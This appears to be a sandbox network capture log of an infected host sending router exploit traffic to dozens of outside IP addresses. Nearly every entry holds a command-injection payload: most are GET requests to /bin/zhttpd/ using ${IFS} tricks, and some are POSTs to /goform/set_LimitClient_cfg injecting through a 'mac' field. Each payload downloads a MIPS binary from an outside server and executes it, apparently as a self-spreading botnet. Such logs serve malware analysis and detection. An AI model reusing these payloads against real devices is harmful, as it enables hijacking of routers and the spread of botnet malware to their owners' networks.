                                                        Jan 28, 2024 10:12:44.246710062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2410192.168.2.1460734170.168.32.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246747971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2411192.168.2.1452816117.229.210.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246779919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2412192.168.2.1437262207.52.169.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246831894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2413192.168.2.1457808173.84.224.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246855021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2414192.168.2.1439364147.233.68.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246891022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2415192.168.2.1451550182.176.197.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246916056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2416192.168.2.1446718121.55.187.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.246962070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2417192.168.2.1458596222.71.82.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.247010946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2418192.168.2.1432890168.179.183.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.247045994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2419192.168.2.144750839.132.195.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.247107983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2420192.168.2.144830817.197.163.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.250041962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2421192.168.2.1443766103.38.144.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.250403881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2422192.168.2.1455152165.64.151.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.250432968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2423192.168.2.1458902138.60.113.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.250473976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2424192.168.2.1456090107.198.122.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.250523090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2425192.168.2.1438862161.241.159.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.250577927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2426192.168.2.144160227.195.145.1178080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:44.522676945 CET233OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:44.893305063 CET1286INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 28 Jan 2024 09:12:44 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 2446
                                                        Connection: close
                                                        x-ws-request-id: 65b61a8c_PSsdzbwtsf144_23603-34461
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 53 75 6e 2c 20 32 38 20 4a 61 6e 20 32 30 32 34 20 30 39 3a 31 32 3a 34 34 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 73 64 7a 62 77 74 73 66 31 34 34 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 3a 38 30 38 30 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20 36 35 62 36 31 61 38 63 5f 50 53 73 64 7a 62 77 74 73 66 31 34 34 5f 32 33 36 30 33 2d 33 34 34 36 31 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 62 72 3e 43 68 65 63 6b 3a 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 43 20 47 22 20 6f 6e 63 6c 69 63 6b 3d 22 73 28 30 29
                                                        Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Sun, 28 Jan 2024 09:12:44 GMT<br><span class="F">IP: 81.181.57.74</span>Node information: PSsdzbwtsf144<br>URL: http://:8080/goform/set_LimitClient_cfg<br>Request-Id: 65b61a8c_PSsdzbwtsf144_23603-34461<br><br>Check:<span class="C G" onclick="s(0)


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2427192.168.2.143351223.126.174.748080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.021522045 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:45.176557064 CET78INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2428192.168.2.1449750181.216.215.2208080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.098011017 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:45.315027952 CET289INHTTP/1.1 404 Not Found
                                                        CONNECTION: close
                                                        CONTENT-LENGTH: 48
                                                        X-XSS-Protection: 1;mode=block
                                                        Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                        X-Content-Type-Options: nosniff
                                                        CONTENT-TYPE: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><body><h1>404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2429192.168.2.1436306182.22.165.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.260905981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2430192.168.2.145225885.250.4.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.260946035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2431192.168.2.1447232107.34.124.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261009932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2432192.168.2.1460932137.7.166.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261022091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2433192.168.2.145413649.45.215.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261054039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2434192.168.2.1443858140.53.236.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261086941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2435192.168.2.143278087.106.164.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261126995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2436192.168.2.1452940112.110.62.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261167049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2437192.168.2.1440438191.173.141.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261198044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2438192.168.2.1445044219.116.141.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261234045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2439192.168.2.1442646117.53.13.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261286974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2440192.168.2.1442448155.238.170.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261322021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2441192.168.2.1434596172.56.203.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261348009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2442192.168.2.1450488216.140.192.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261384964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2443192.168.2.1453550166.73.76.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261432886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2444192.168.2.1449878188.208.22.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261470079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2445192.168.2.1457430211.250.239.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261521101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2446192.168.2.1452518123.161.13.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261563063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2447192.168.2.1455630172.101.7.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261605024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2448192.168.2.1442884146.250.108.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261631012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2449192.168.2.143569688.73.136.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:45.261660099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2450192.168.2.1434080220.92.132.103443
                                                        TimestampBytes transferredDirectionData
